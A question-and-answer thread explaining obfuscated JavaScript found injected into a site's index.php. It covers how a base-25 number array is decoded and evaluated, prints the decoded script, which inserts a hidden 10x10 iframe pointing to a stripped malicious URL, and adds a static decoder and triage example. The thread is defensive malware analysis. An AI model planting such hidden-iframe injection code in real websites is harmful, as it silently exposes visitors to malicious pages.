
Why is this obfuscated JavaScript code malicious?


A friend of mine's site was being listed as malicious, and we found some obfuscated code that had been injected into his index.php without him knowing. I deobfuscated the code down two levels and found this:

(code can be viewed in the edit history)

Can anyone tell me what it's trying to do and why it's malicious..?


Solution

  • To summarize, the code "decodes" HTML which places an <iframe> that loads in a malicious URL.

    The following line has the "encoded" HTML:

    n = ["9","9","45","42", ...
    

    Each number represents a character that is in base-25. The code will loop through this array and use JavaScript's String.fromCharCode() to convert it to an ASCII character. After all of this, it will eval() it to place it on the page.

    The "decoded" JavaScript is:

    if (document.getElementsByTagName('body')[0]){
        iframer();
    } else {
        document.write("<iframe src='[stripped]' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
    }
    function iframer(){
        var f = document.createElement('iframe');f.setAttribute('src','[stripped]');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
        document.getElementsByTagName('body')[0].appendChild(f);
    }
    

    Note, I have stripped the malicious URL from the code for safety purposes.
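
An added example, not part of the original answer: the same decoding done statically, so the payload can be read and triaged without ever passing it to eval(). The function names, the sample payload and the `placeholder.invalid` URL are assumptions constructed for illustration; only the first four array values come from the page.

```javascript
// Added example. Decodes the numeric array to text; nothing is eval()'d.
function decodeBase25(tokens) {
  return tokens.map((t, i) => {
    // Base-25 digits are 0-9 and a-o. parseInt() silently stops at the first
    // invalid digit, so validate the whole token before converting it.
    if (!/^[0-9a-o]+$/i.test(String(t))) {
      throw new Error(`token ${i} is not base-25: ${JSON.stringify(t)}`);
    }
    return String.fromCharCode(parseInt(t, 25));
  }).join('');
}

// Inspect the decoded script as a string and report the iframe indicators.
function triage(decoded) {
  const iframeSrcs = [];
  // Matches src='...' in markup and setAttribute('src','...') in script.
  const re = /src\s*(?:=|['"]\s*,)\s*['"]([^'"]*)['"]/g;
  let m;
  while ((m = re.exec(decoded)) !== null) {
    if (!iframeSrcs.includes(m[1])) iframeSrcs.push(m[1]);
  }
  return {
    iframeSrcs,
    createsIframe: /<iframe|createElement\(\s*['"]iframe/i.test(decoded),
    hidden: /visibility\s*[:=]\s*['"]?hidden/i.test(decoded),
  };
}

// Constructed sample: same shape as the decoded payload, placeholder URL.
const SAMPLE_JS =
  "document.write(\"<iframe src='https://placeholder.invalid/' " +
  "width='10' height='10' style='visibility:hidden;'></iframe>\");";
// Constructed input: the sample as base-25 strings, like the page's n array.
const SAMPLE_TOKENS = Array.from(SAMPLE_JS, c => c.charCodeAt(0).toString(25));

// The four values quoted in the answer, then the constructed sample.
console.log(JSON.stringify(decodeBase25(['9', '9', '45', '42'])));
console.log(triage(decodeBase25(SAMPLE_TOKENS)));
```

The four values quoted in the answer decode to two tab characters followed by `if`, which matches the start of the decoded script shown above.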